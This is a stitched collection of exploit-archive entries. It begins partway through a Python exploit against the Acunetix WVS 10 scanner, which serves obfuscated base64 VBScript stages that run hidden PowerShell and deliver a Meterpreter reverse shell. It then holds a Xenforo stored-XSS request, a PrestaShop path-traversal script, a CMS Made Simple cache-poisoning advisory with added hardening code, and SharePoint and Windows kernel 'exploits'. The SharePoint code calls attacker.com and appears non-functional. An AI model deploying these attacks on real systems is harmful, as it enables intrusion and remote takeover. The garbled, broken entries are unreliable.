"ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \
"2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg=="
# param NO
EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \
"RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \
"iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \
"FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \
"cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \
"iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \
"0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \
"0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \
"D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \
"6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \
"HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \
"9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \
"nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \
"yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \
"CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \
"HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \
"D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \
"oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \
"l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \
"0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \
"211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \
"MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \
"iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \
"TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \
"CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \
"udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \
"hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \
"IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \
"wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \
"d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \
"RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \
"dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \
"pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \
"clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \
"xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \
"ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \
"I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \
"IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \
"IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \
"IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \
"Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \
"Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \
"BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \
"b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \
"I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \
"LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \
"RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \
"b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \
"1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \
"c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \
"F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \
"LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA=="
class myHandler(BaseHTTPRequestHandler):
    timeout = 5
    server_version = "Apache"
    sys_version = "1.2"

    def log_message(self, format, *args):
        try:
            paths = str(list(args)[0])
            if "prompt" in paths or "confirm" in paths or "alert" in paths:
                print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \
                      (len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1))
            if "stage2" in paths:
                print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" % len(EXPLOIT_STAGE_2)
            return
        except:
            pass
        return

    def do_POST(self):
        PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
                                                        "%TEMP%", gen_random_name(12))
        data = self.rfile.read(int(self.headers.getheader("Content-Length")))
        data = data.split("&")
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        for param in data:
            if "usr" in param:
                param = param.split("=")[1]
                self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
                                 % (base64.b64encode("".join(x + "\x00" for x in PDE)),
                                    ("Bad password for user %s , <a href=\"/\">try again</a>." % param)))
                return
        self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
                         % (base64.b64encode("".join(x + "\x00" for x in PDE)),
                            "Some data are missing , <a href=\"/\">try again</a>."))
        return

    def do_GET(self):
        try:
            if self.path == "/":
                self.send_response(302)
                self.send_header('Content-type', 'text/html')
                self.send_header('Location', "login")
                self.end_headers()
                # Send the html message
                self.wfile.write("<a href='/?url=test'>Here</a>")
                return
            elif self.path == "/stage2":
                self.send_response(200)
                self.send_header('Content-type', 'text/plain')
                self.end_headers()
                # Send the html message
                self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2)
                                 % (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%"))
                postexpthread = Thread(target=postexploitation, args=(self.client_address[0], ))
                postexpthread.start()
                return
            else:
                string = ""
                try:
                    string = self.path.split("=")[1]
                except:
                    pass
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                # Send the html message
                PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
                                                                "%TEMP%", gen_random_name(12))
                self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
                                 % (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM)))
                return
        except Exception as e:
            print e.message
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            self.wfile.write("")
            return


if __name__ == "__main__":
    print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \
          "Payload: Meterpreter reverse TCP 4444"
    try:
        if len(sys.argv) > 2:
            # Create a web server and define the handler to manage the
            # incoming request
            server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler)
            print 'Exploit started on port *:%s' % sys.argv[1]
            print '[+] Waiting for scanner...'
            # Wait forever for incoming http requests
            server.serve_forever()
        else:
            print "Usage: %s <port> <local ip/domain name>" % os.path.basename(sys.argv[0])
    except KeyboardInterrupt:
        print '^C received, shutting down the web server'
        server.socket.close()
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------
Requests
POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"
<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"
/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"
json
-----------------------------333176689514537912041638543422--
Response: once the smilie category has been created, the alert fires immediately.
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198
import requests
import string
import random
# The base URL of the vulnerable site
base_url = "http://example.com"
# The URL of the login page
login_url = base_url + "/authentication.php"
# The username and password for the admin account
username = "admin"
password = "password123"
# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"
# The ID of the order to download
order_id = 1234
# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id
# The session cookies to use for the requests
session_cookies = None
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)
# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()
# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))
# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)
# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)
# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
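The entry above names the weakness (CWE-22, improper limitation of a pathname to a restricted directory) but the script only fetches one order document and never shows the check that was missing. The block below is an added example, not code from the module or from the exploit author: it puts the flawed pattern (join a client-supplied name onto the storage directory and open it) beside a containment check that rejects traversal instead of trying to sanitise it. The storage directory and the file names are assumptions; the page only gives the endpoint path.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical storage directory for generated order documents; the module's real
# layout is not described on the page, only the download.php endpoint path.
DOWNLOAD_ROOT = "/var/www/shop/modules/winbizpayment/downloads/files"


def vulnerable_download_path(requested, root=DOWNLOAD_ROOT):
    """The pattern behind CWE-22: a client-controlled name is joined onto the
    storage directory and the result is opened as-is. normpath() shows where
    the request really lands on disk."""
    return posixpath.normpath(posixpath.join(root, unquote(requested)))


def resolve_download(requested, root=DOWNLOAD_ROOT):
    """Return the on-disk path for a requested name, or None if it would leave root.

    The web server has already URL-decoded the parameter once, which is mirrored
    here. The decoded value is normalised and then checked for containment, so
    "../" sequences, absolute paths, NUL bytes and backslashes are rejected rather
    than stripped (stripping is what double-encoding tricks are built to defeat).
    """
    name = unquote(requested)
    if not name or "\x00" in name or "\\" in name:
        return None
    candidate = posixpath.normpath(posixpath.join(root, name))
    # An absolute request replaces root entirely in join(); commonpath catches that
    # as well as "../" escapes. Requesting the directory itself is not a file.
    if candidate == root or posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("order_1234.pdf", "../../../../etc/passwd", "..%2F..%2Fconfig%2Fsettings.inc.php"):
        print(repr(probe), "->", vulnerable_download_path(probe), "| hardened:", resolve_download(probe))
```

`posixpath` is used on purpose so the result is identical on every platform and matches a Linux-hosted shop; a Windows deployment would additionally need to treat `\` as a separator, which is why the hardened version refuses it outright.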
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
# Microsoft
# Apache Ambari
# Microsoft Azure HDInsight
# Tested on: Windows/Linux
# CVE : CVE-2023-23408
import requests
# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
# Define a function to validate the headers
def validate_headers(headers):
    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
        return False
    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
        return False
    return True

# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
    if not validate_headers(headers):
        print("Invalid headers")
        return
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")

# Call the send_request function with the URL and headers
send_request(url, headers)
=============================================
Web Server Cache Poisoning in CMS Made Simple
=============================================
CVE-2016-2784
Product Description
===================
CMS Made Simple is a great tool with many plugins to publish content on the Web. It aims to
be simple to use by end users and to provide a secure and robust website.
Website: http://www.cmsmadesimple.org/
Description
===========
A remote unauthenticated attacker can insert malicious content into a CMS Made Simple
installation by poisoning the web server cache: when Smarty caching is activated, the
value of the Host HTTP header in the attacker's request ends up in the cached pages.
The vulnerability can be triggered only if the Host header plays no part in the web
server's routing, that is, if the application receives requests whatever Host value they
carry (for example a default or catch-all virtual host).
This can lead to phishing attacks through modified site links, to defacement, or to
Cross-Site Scripting, because HTML entities in the $_SERVER variable are not filtered.
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-20
**CVSS Base score**: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
----------------
Proof of Concept
----------------
Request that shows improper HTML entity filtering and inserts
' onload='javascript:alert(Xss) into the pages (the Host value is written so that a
single-pass removal of the string "script:" still leaves "javascript:" behind):
GET / HTTP/1.1
Host: ' onload='javascrscript:ipt:alert(Xss)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Request that changes the root domain of all links and allows redirection to external
websites:
GET / HTTP/1.1
Host: www.malicious.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Solution
========
Use the variable $_SERVER['SERVER_NAME'] instead of $_SERVER['HTTP_HOST'], provided
that the server name is correctly defined, or use an application-specific constant.
Note that on Apache, $_SERVER['SERVER_NAME'] is only independent of the request when
UseCanonicalName is On; with the default UseCanonicalName Off it is derived from the
Host header as well, so a fixed constant is the safer choice.
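To make the fix concrete, the block below is an added example (not CMS Made Simple code and not the advisory author's) that contrasts the flawed pattern with the recommended one, using the two Host values from the Proof of Concept above. The allowlist, the canonical hostname and the template fragment are assumptions standing in for the application's configuration and Smarty template.

```python
import html
import re

# Constructed inputs modelled on the two PoC requests above; not captured traffic.
POC_XSS_HOST = "' onload='javascrscript:ipt:alert(Xss)"
POC_REDIRECT_HOST = "www.malicious.com"

# Hypothetical deployment: the names this installation is actually served under.
ALLOWED_HOSTS = {"www.example.org", "example.org"}
CANONICAL_HOST = "www.example.org"
# RFC 1123-style hostname labels; anything else (quotes, spaces, IPv6 literals) is
# not a name the operator configured, so it is simply not matched.
HOSTNAME_RE = re.compile(r"[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*")


def vulnerable_base_url(headers):
    """The flawed pattern: the Host header is trusted verbatim and, once Smarty caches
    the page, every later visitor receives links built from it."""
    return "http://" + headers.get("Host", "") + "/"


def strip_once(value, token="script:"):
    """A single-pass blacklist filter. The PoC Host value is constructed so that
    removing "script:" once leaves "javascript:" behind."""
    return value.replace(token, "", 1)


def hardened_base_url(headers):
    """Build the base URL from operator configuration, not from the request.

    The Host value is only used as a selector: after dropping an optional port it
    must be a syntactically valid hostname and must appear in the allowlist;
    anything else falls back to the canonical name. A poisoned cache entry can
    therefore only ever contain a hostname the operator configured.
    """
    raw = headers.get("Host", "")
    host = raw.rsplit(":", 1)[0].strip().lower()  # "example.org:8080" -> "example.org"
    if not HOSTNAME_RE.fullmatch(host) or host not in ALLOWED_HOSTS:
        return "http://" + CANONICAL_HOST + "/"
    return "http://" + host + "/"


def render_link(base_url):
    """Template fragment: attribute values are HTML-escaped on output whatever their
    origin, which is the second, independent layer the advisory's XSS case needs."""
    return "<a href='%s'>home</a>" % html.escape(base_url, quote=True)


if __name__ == "__main__":
    for host in (POC_XSS_HOST, POC_REDIRECT_HOST, "example.org:8080"):
        hdrs = {"Host": host}
        print(repr(host))
        print("  vulnerable:", render_link(vulnerable_base_url(hdrs)))
        print("  hardened:  ", render_link(hardened_base_url(hdrs)))
```

The allowlist is the part that actually defeats cache poisoning; output escaping alone would stop the `onload` payload but still let `www.malicious.com` be cached into every link, which is the phishing case the advisory describes.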
Fixes
=====
Upgrade to CMS Made Simple 2.1.3 or 1.12.2.
See http://www.cmsmadesimple.org/2016/03/Announcing-CMSMS-1-12-2-kolonia and
http://www.cmsmadesimple.org/2016/04/Announcing-CMSMS-2-1-3-Black-Point for upgrade
instructions.
Mitigation : disable Smarty caching in the admin panel.
Affected Versions
=================
CMS Made Simple < 2.1.3 and < 1.12.2
Vulnerability Disclosure Timeline
=================================
02-24-2016: Vendor contacted
02-24-2016: Vulnerability confirmed by the vendor
03-01-2016: CVE identifier assigned
03-28-2016 & 04-16-2016: Vendor patch release
05-03-2016: Public Disclosure
Credits
=======
* Mickaël Walter, I-Tracing (lab -at- i-tracing -dot- com)
Website: http://www.i-tracing.com/
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "wininet.lib")

// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";
// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";
// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";
// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

// Defined after main(); declared here so main() can call it
BOOL InternetReadFileUrl(const char *url, HANDLE file);

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %lu\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, (DWORD)strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %lu\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %lu\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");
    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293
#include <windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(lib, "advapi32.lib")

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";
// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";
// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003
// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

// Defined after main(); declared here so main() can call them
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name);
BOOL UnloadDriver(LPCTSTR service_name);

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE];

    // Load the vulnerable driver
